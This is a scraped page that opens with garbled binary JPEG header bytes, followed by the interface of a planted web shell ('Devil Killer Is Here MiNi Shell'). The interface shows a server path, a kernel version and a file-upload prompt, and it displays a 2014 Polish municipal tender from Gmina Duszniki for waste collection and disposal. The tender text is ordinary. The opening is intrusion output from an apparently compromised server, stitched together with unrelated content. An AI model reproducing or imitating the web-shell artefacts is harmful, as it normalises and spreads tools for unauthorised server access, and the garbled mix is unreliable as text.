JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141015/342732-N-2014.html

<p class="kh_header"><b>Duszniki: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki</b><br>
<b>Numer ogłoszenia: 342732 - 2014; data zamieszczenia: 15.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Duszniki , ul. Sportowa 1, 64-550 Duszniki, woj. wielkopolskie, tel. 61 2919075, 2919400, faks 61 2919131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.duszniki.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Obieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Duszniki

1.	Obszar Gminy Duszniki wynosi 15 628 ha. W skład Gminy Duszniki wchodzi 20 miejscowości (17 sołectw). Gmina Duszniki liczy wg złożonych deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi: 8482 mieszkańców (stan według terminu płatności na 30 września 2014r.). Przeważająca część mieszkańców zamieszkuje budynki jednorodzinne. Szacunkowa liczba gospodarstw domowych - ok. 2191.

W trakcie trwania zamówienia liczba nieruchomości zamieszkałych może ulec zmianie w wyniku oddania do użytku i zamieszkania nowych budynków lub wyludnienia. Przyjmuje się ok. 15 proc. zmienną liczby gospodarstw domowych podczas realizacji zamówienia. Przekroczenie tego progu może skutkować zmianą ustaleń umowy.

Zbiórka, wywóz i zagospodarowanie odpadów winno odbywać się zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Wielkopolskiego na lata 2012-2017 oraz przepisami prawa polskiego.

2.	Zabudowa jednorodzinna.
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpadów komunalnych.
- Niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów:
niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewni właściciel nieruchomości i ustawi je w miejscu umożliwiającym swobodny dojazd i dostęp.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów komunalnych (zmieszanych) - co 21 dni w godz. 7.00 - 20.00.
- Selektywnie zbierane odpady komunalne:
selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym. Wprowadza się następujące rodzaje worków:
	żółty - do gromadzenia odpadów z tworzyw sztucznych,
	niebieski - do gromadzenia odpadów z papieru i tektury,
	zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów zapewnia wykonawca w ilości niezbędnej do odbioru, na każdą z wyżej wymienionych frakcji.
Charakterystyka worków do selektywnej zbiórki odpadów:
	materiał - folia polietylenowa LDPE,
	pojemność - 120 l
	grubość - co najmniej 60 mikronów.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie - co 21 dni w godz. 7.00 - 20.00. 
- Odpady biodegradowalne (w tym zielone):
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku. 
- Odpady wielkogabarytowe i meble-
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
-Zużyty sprzęt elektryczny i elektroniczny:
nie jest objęty niniejszym postępowaniem o udzielenie zamówienia publicznego.
-Odpady budowlane i rozbiórkowe:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
-Chemikalia oraz odpady niebezpieczne typu leki:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na kwartał.
- Zużyte baterie i akumulatory:
nie są objęte niniejszym postępowaniem o udzielenie zamówienia publicznego.
-Metale:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
a)	Zużyte opony:
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku. 

3.	Zabudowa wielorodzinna.
Na terenie zabudowy wielorodzinnej obowiązywać będzie system mieszany pojemnikowo-workowy zbiórki odpadów komunalnych.
a)	Niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów:
niesegregowane (zmieszane) odpady komunalne i pozostałości z segregacji odpadów gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewniają właściciel nieruchomości i ustawiają je w miejscu umożliwiającym swobodny dojazd i dostęp.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów komunalnych (zmieszanych) - co 21 dni w godz. 7.00 - 20.00.
b)	Selektywnie zbierane odpady komunalne:
selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej będzie się odbywać w systemie workowym. Wprowadza się następujące rodzaje worków:
	żółty - do gromadzenia odpadów z tworzyw sztucznych,
	niebieski - do gromadzenia odpadów z papieru i tektury,
	zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów zapewnia wykonawca w ilości niezbędnej do odbioru, na każdą z wyżej wymienionych frakcji.
Charakterystyka worków do selektywnej zbiórki odpadów:
	materiał - folia polietylenowa LDPE,
	pojemność - 120 l
	grubość - co najmniej 60 mikronów.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie - co 21 dni w godz. 7.00 - 20.00. 
c)	Odpady biodegradowalne (w tym zielone): 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
d)	Odpady wielkogabarytowe i meble: 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
e)	Zużyty sprzęt elektryczny i elektroniczny: 
nie jest objęty niniejszym postępowaniem o udzielenie zamówienia publicznego.
f)	Odpady budowlane i rozbiórkowe: 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
g)	Chemikalia oraz odpady niebezpieczne typu leki: 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na kwartał. 
h)	Zużyte baterie i akumulatory: 
nie są objęte niniejszym postępowaniem o udzielenie zamówienia publicznego.
i)	Metale: 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.
j)	Zużyte opony: 
mieszkańcy samodzielnie dostarczają odpady do trzech punktów selektywnej zbiórki odpadów komunalnych zlokalizowanych w Dusznikach, Podrzewiu i Grzebienisku. Odbiór odpadów przez Wykonawcę w terminie 3 dni roboczych od dnia zgłoszenia przez Zamawiającego, jednak nie rzadziej niż raz na pół roku.

4.	Punkty selektywnej zbiórki odpadów.
Wykonawca wyposaży trzy punkty selektywnej zbiórki odpadów komunalnych zlokalizowane w Dusznikach, Podrzewiu i Grzebienisku oraz sołtysów wszystkich sołectw na terenie gminy Duszniki, w worki do selektywnej zbiórki odpadów komunalnych. Wprowadza się następujące rodzaje worków:
	żółty - do gromadzenia odpadów z tworzyw sztucznych,
	niebieski - do gromadzenia odpadów z papieru i tektury,
	zielony - do gromadzenia odpadów ze szkła.
Worki z nadrukiem odpowiadającym rodzajowi poszczególnych gromadzonych odpadów jednorazowo zapewnia wykonawca w ilości 300 sztuk, na każdą z wyżej wymienionych frakcji, na każdy punkt oraz 150 sztuk, na każdą z wyżej wymienionych frakcji, dla każdego sołtysa. Zamawiający zastrzega możliwość zamówienia dodatkowych worków, w ilości zagłoszonej przez Zamawiającego.
Charakterystyka worków do selektywnej zbiórki odpadów:
	materiał - folia polietylenowa LDPE,
	pojemność - 120 l
	grubość - co najmniej 60 mikronów.

5.	Wykaz urządzeń do gromadzenia odpadów.
Do gromadzenia odpadów na terenie Gminy Duszniki służą pojemniki spełniające techniczne warunki bezpieczeństwa i higieny sanitarnej, o pojemności:
	dla budynków mieszkalnych w zabudowie jednorodzinnej - 60 l na mieszkańca, jednak co najmniej jeden pojemnik 120 l na każda nieruchomość, dla osób samotnych dopuszcza się możliwość ustawienia pojemnika o pojemności 60 l,
	dla budynków mieszkalnych w zabudowie wielorodzinnej -  60 l na mieszkańca, jednak co najmniej jeden pojemnik 120 l na każda nieruchomość, dla osób samotnych dopuszcza się możliwość ustawienia pojemnika o pojemności 60 l, ponadto dopuszcza się możliwość ustawienia pojemnika o pojemności 1100 l.
Do selektywnej zbiórki odpadów Wykonawca jest zobowiązany dostarczyć worki z folii polietylenowej LDPE o grubości dostosowanej do ilości odpadów, uniemożliwiającej rozerwanie się worka, w kolorach:
	żółtym - 120 l,
	niebieskim - 120 l,
	zielonym - 120 l.
Na workach umieszcza się w widocznym miejscu na tle odpowiadającym kolorem dla danego rodzaju odpadów widoczny napis:
	SZKŁO - w przypadku worka na odpady za szkła,
	PAPIER - w przypadku worka na odpady z papieru i tektury,
	PLASTIK - w przypadku worka na odpady z tworzyw sztucznych. 

6.	Wykaz sprzętu technicznego.
Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępniania potencjału, w tym minimalne wymagania:
a)	W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co najmniej:
	dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych i pozostałości z segregacji odpadów (śmieciarki),
	dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych,
	jeden pojazd do odbierania odpadów bez frakcji kompaktującej.
b)	Szczegółowe wymagania dla pojazdów:
	pojazdy powinny być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu,
	konstrukcja pojazdów powinna zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz powinna minimalizować oddziaływanie czynników atmosferycznych na odpady,
	pojazdy powinny być poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na dwa tygodnie,
	pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
	na koniec każdego dnia roboczego pojazdy powinny być opróżnione z odpadów i parkowane wyłącznie na terenie bazy magazynowo-transportowej,
	pojazdy powinny być trwale i czytelnie oznakowane w sposób umożliwiający identyfikację przedsiębiorcy (nazwa firmy, dane adresowe, numer telefonu),
	pojazdy powinny być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujników zapisujących dane o miejscach wyładunku odpadów - umożliwiający weryfikację tych danych.
c)	Wymagania dla bazy magazynowo-transportowej:
	baza magazynowo-transportowa powinna być usytuowana w gminie, z terenu której odbiera te odpady lub w odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawy,
	teren bazy transportowej powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom  nieupoważnionym,
	baza magazynowo-transportowa powinna być wyposażona w:
- miejsca przeznaczone do parkowania pojazdów,
- pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
- miejsca magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
-legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów.
	miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
	na terenie bazy transportowej powinien znajdować się punkt bieżącej konserwacji i napraw pojazdów, miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy transportowej,
	teren bazy magazynowo-transportowej powinien być wyposażony w urządzenia lub systemu zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001r. Prawo wodne (Dz. U. z 2012r., poz. 145, 951 i 1513 oraz z 2013r., poz. 21). 

7.	Szczegółowe dane charakteryzujące zamówienie.
a)	Wykaz szacunkowej liczby gospodarstw domowych, a tym samym miejsc gromadzenia odpadów określa SIWZ.


b)	Wykonawca zobowiązany będzie do odbierania od właścicieli nieruchomości zamieszkałych:
	niesegregowanych (zmieszanych) odpadów komunalnych - w ilości 60 l miesięcznie na jednego mieszkańca
	tworzywa sztuczne, szkło oraz papier i makulatura - w każdej ilości
c)	Rozliczenie wynagrodzenia ryczałtowego za wykonanie przedmiotu umowy nastąpi w miesięcznych ratach niezależnie od ilości zebranych odpadów. Wykonawca będzie zobowiązany odbierać odpady również z nieruchomości zamieszkałych, które powstaną w okresie trwania umowy.
d)	Wymagania stawiane wykonawcy:
	wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
	wymagana jest należyta staranność przy realizacji zobowiązań umowy.
	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.
	określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
	zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia.
e)	Obowiązkiem Wykonawcy będzie również posprzątanie miejsca wokół pojemników, gdzie zajdzie taka potrzeba, między innymi poprzez zabranie dostawionych przy pojemnikach worków z niesegregowanymi (zmieszanymi) odpadami komunalnymi. Wykonawca jest zobowiązany również do zabrania odpadów leżących obok altanek śmietnikowych czy pojemników jeśli jest to wynikiem jego działalności.
f)	Wykonawca zobowiązany jest do odbierania odpadów komunalnych z poszczególnych nieruchomości zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu, na podstawie którego będzie realizowana usługa odbioru odpadów komunalnych z uwzględnieniem całego okresu realizacji przedmiotu zamówienia z podziałem na odpady komunale (zmieszane), odpady zbierane w sposób selektywny (papier i tektura, szkło, tworzywa sztuczne). Wykonawca jest obowiązany do przedstawienia pierwszego projektu harmonogramu wywozu odpadów do dnia 10 grudnia 2014 roku, natomiast zatwierdzone harmonogramy muszą zostać dostarczona właścicielom nieruchomości w nieprzekraczalnym terminie do 31 grudnia 2014r. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem odpadów komunalnych. Wywóz odpadów będzie odbywał się ściśle wg harmonogramu. Odbiór odpadów przez wykonawcę musi odbywać się w dni robocze, od poniedziałku do piątku, w godzinach 7.00 - 20.00. Wykonawca pod żadnym pozorem nie może w trakcie odbioru i transportu mieszać odpadów gromadzonych selektywnie z odpadami gromadzonymi w sposób nieselektywny.
g)	Wykonawca zobowiązany jest do zapewnienia właścicielom nieruchomości worków do selektywnej zbiórki odpadów. Worki muszą być oznaczone przez Wykonawcę informacją o rodzaju odpadów, które należy w nich gromadzić. Worki do selektywnej zbiórki muszą też być oznaczone nazwą, adresem i numerem telefonu Wykonawcy oraz logo gminy Duszniki. Czytelna instrukcja umieszczona na workach ma ułatwić właścicielom nieruchomości prowadzenie selektywnej zbiórki odpadów. Wzór oznaczenia i opisania worków do selektywnej zbiórki odpadów zatwierdza Zamawiający. Pierwsza partia worków musi zostać dostarczona właścicielom w nieprzekraczalnym terminie do 31 grudnia 2014r. W przypadku braku właściciela, worki należy dostarczyć przedstawicielowi właściciela. Za przedstawiciela Zamawiający uważa każdego pełnoletniego domownika zamieszkującego daną posesję. Przy każdorazowym odbiorze selektywnie zebranych odpadów komunalnych wykonawca pozostawi worki w ilości odpowiadającej workom odebranym. Worki należy pozostawić, w miejscu widocznym przy wejściu na posesję, w sposób zabezpieczający przed np. porwaniem worków przez wiatr. 
h)	Wykonawca obowiązany jest umożliwić właścicielom nieruchomości zakup lub dzierżawę pojemników do gromadzenia odpadów. Koszty zakupu lub dzierżawy pojemników zostają ustalone przez Wykonawcę indywidualnie z mieszkańcami. 
i)	Wykonawca jest obowiązany do realizacji reklamacji (np. nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane)  w przeciągu 36 godzin od otrzymania zawiadomienia e-mailem od Zamawiającego. Wykonanie reklamacji należy niezwłocznie potwierdzić e-mailem na adres Zamawiającego. Właściciel nieruchomości ma obowiązek wystawiania pojemników (worków) w ściśle określonym terminie oraz przed określoną godziną. Informacje te będą zawarte w harmonogramach, które trafią do każdej nieruchomości zamieszkałej. W przypadku braku wystawionego pojemnika lub worków, w celu udokumentowania tego faktu należy sporządzić dokumentację fotograficzną z datownikiem i godziną, o której pojazd podjechał po odbiór odpadów. Każdy przypadek nieodebrania odpadów z winy właściciela Wykonawca zobowiązany jest zgłosić (z załączonym potwierdzeniem) Zamawiającemu.
j)	W przypadku nieruchomości, które w części stanowią nieruchomości zamieszkałe, a w części nieruchomości na których nie zamieszkują mieszkańcy, system odbierania odpadów komunalnych nie obejmuje odpadów komunalnych powstających na części nieruchomości na której nie zamieszkują mieszkańcy (np. odpady komunalne powstające w wyniku prowadzenia działalności gospodarczej).
k)	Wykonawca zobowiązany jest zapewnić Zamawiającemu odczyt z systemu monitoringu bazującego na systemie pozycjonowania satelitarnego, w który wyposażone będą pojazdy Wykonawcy. Obowiązek ten ciąży także na Wykonawcy przez okres 3 miesięcy od zakończenia obowiązywania umowy.
l)	Wykonawca zobowiązany jest do prowadzenia i przekazywania Zamawiającemu ewidencji nieruchomości z których zostały odebrane zmieszane i selektywnie zbierane odpady w zakresie ilości zebranych odpadów (ilość i pojemność pojemników z odpadami zmieszanymi oraz ilość poszczególnych worków z odpadami zbieranymi selektywnie). Ewidencję taką Wykonawca zobowiązany jest przedkładać Zamawiającemu do 10 dnia miesiąca następującego po miesiącu sprawozdawczym. Ewidencję należy prowadzić w formie elektronicznej. 
ł) Wykonawca zobowiązany jest kontrolować realizowanie przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, a  w przypadku ich niedopełnienia Wykonawca zobowiązany jest przyjąć odpady jako zmieszane odpady komunalne i niezwłocznie pisemnie powiadomić o tym Zamawiającego, nie później niż w ciągu 3 dni. Do informacji Wykonawca zobowiązany będzie dołączyć dokumentację fotograficzną umożliwiającą identyfikację nieruchomości z rejestracją daty i godziny. Zamawiający zastrzega sobie prawo do udziału w wybiórczej kontroli właścicieli nieruchomości w przedmiotowym zakresie. Poprzez niedopełnienie obowiązku selektywnego zbierania odpadów komunalnych Zamawiający rozumie ewidentne, rażące naruszanie zasad segregacji, np. w pojemniku na odpady zmieszane znajduje się przeważająca ilość odpadów podlegających segregacji (szkło, plastik, papier) czy w przejrzystych workach na odpady segregowane naocznie zaobserwować można frakcje odpadów zabronione do gromadzenia w poszczególnych workach. Wykaz nieruchomości prowadzących selektywne zbieranie odpadów komunalnych Zamawiający przekaże Wykonawcy do 15 grudnia 2014 roku.
m)	Wykonawca zobowiązany jest do przekazywania:
	odebranych zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do regionalnej instalacji przetwarzania odpadów komunalnych wskazanej w Planie Gospodarki Odpadami dla Województwa Wielkopolskiego, zgodnie z art. 9e ust. 1 pkt 2 ustawy o utrzymaniu czystości i porządku w gminach. 
	selektywnie zbieranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 18 ustawy z dnia 14 grudnia 2012 roku o odpadach (t.j.: Dz.U. z 2013 poz. 21 ze zm.) - zgodnie z art. 9e ust. 1 pkt 1 w/w ustawy. W tym przypadku to odbierający wskazuje instalacje, do których będzie przekazywał odpady komunalne zbierane selektywnie. Ważne jest aby były to instalacje zapewniające uzyskanie właściwych poziomów odzysku i recyklingu poszczególnych frakcji odpadowych.
n)	Wykonawca zobowiązany jest do naprawy pojemników w razie uszkodzenia ich z winy wykonawcy, a nie z powodu upływu czasu eksploatacji. 
o)	Wykonawca w okresie obowiązywania umowy zobowiązany jest osiągnąć poziom recyklingu i przygotowania do ponownego użycia wymaganych frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła oraz poziom recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w wysokościach określonych w przepisach Rozporządzenia Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2012 roku poz. 645).
